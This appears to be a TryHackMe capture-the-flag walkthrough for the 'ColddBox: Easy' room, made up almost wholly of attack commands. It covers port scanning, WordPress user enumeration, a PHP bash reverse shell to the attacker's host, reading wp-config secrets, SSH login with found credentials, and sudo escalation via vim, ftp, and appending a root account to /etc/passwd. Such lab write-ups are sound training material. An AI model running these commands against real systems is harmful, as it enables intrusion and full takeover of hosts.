ColddBox: Easy
Room Link: https://tryhackme.com/room/colddboxeasy
Initial Scan
Kali
nmap -A $VICTIM
Scan all ports
port 4512 found
Kali
nmap -sV -sT -O -p 1-65535 $VICTIM
TCP/80 - HTTP
Kali
gobuster dir -u http://$VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt
Kali
wpscan --url http://$VICTIM/ --enumerate u
Username: c0ldd
Password: 9876543210Reverse Shell
revshell code
<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/$KALI/443 0>&1'");
?>
Kali
nc -lvnp 443Then just go to a page that doesn't exist, in this case p=1 existed but p=2 did not.
Victim
cat /var/www/html/wpconfig.php
TCP/4512 - SSH
Victim
ssh c0ldd@$VICTIM -p 4512
Password: cybersecurity
Privilege Escalation Option 1 - VIM
Victim
sudo -l
sudo vim -c ':!/bin/sh'
Privilege Escalation Option 2 - FTP
Victim
sudo ftp
!/bin/sh
Privilege Escalation Option 3 - chmod
Victim
ls -lah /etc/passwd
LFILE=/etc/passwd
sudo chmod 6777 $LFILE
ls -lah /etc/passwd
echo 'new:$1$new$p7ptkEKU1HnaHpRtzNizS1:0:0:root:/root:/bin/bash' >> /etc/passwdVictim
su new
Password: 123
Last updated